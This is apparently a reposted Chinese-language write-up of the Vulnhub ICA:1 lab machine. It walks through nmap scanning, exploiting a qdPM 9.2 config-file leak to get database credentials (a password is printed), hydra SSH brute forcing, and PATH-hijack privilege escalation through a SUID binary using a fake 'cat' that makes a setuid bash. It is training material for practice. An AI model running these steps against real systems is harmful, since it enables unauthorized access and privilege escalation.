Vulnhub: ICA:1靶机

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

Vulnhub: ICA:1靶机_第1张图片

访问目标80,发现目标CMS为qdPM 9.2

Vulnhub: ICA:1靶机_第2张图片

搜索对应漏洞发现存在信息泄露

searchsploit qdpm

Vulnhub: ICA:1靶机_第3张图片

Vulnhub: ICA:1靶机_第4张图片

访问192.168.111.130/core/config/databases.yml得到目标数据库账号密码

Vulnhub: ICA:1靶机_第5张图片

利用数据库中的账号密码爆破ssh

mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h192.168.111.130

Vulnhub: ICA:1靶机_第6张图片

hydra -L ./user.txt -P ./pass.txt 192.168.111.130 -s 22 ssh -t 64

Vulnhub: ICA:1靶机_第7张图片

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

Vulnhub: ICA:1靶机_第8张图片

该程序执行的时候同时会执行cat命令

strings /opt/get_access

Vulnhub: ICA:1靶机_第9张图片

修改环境变量提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/cat
chmod 777 /tmp/cat
export PATH=/tmp:$PATH
./get_access
/tmp/bash -p

Vulnhub: ICA:1靶机_第10张图片

Vulnhub: ICA:1靶机_第11张图片

你可能感兴趣的:(安全,web安全,网络安全)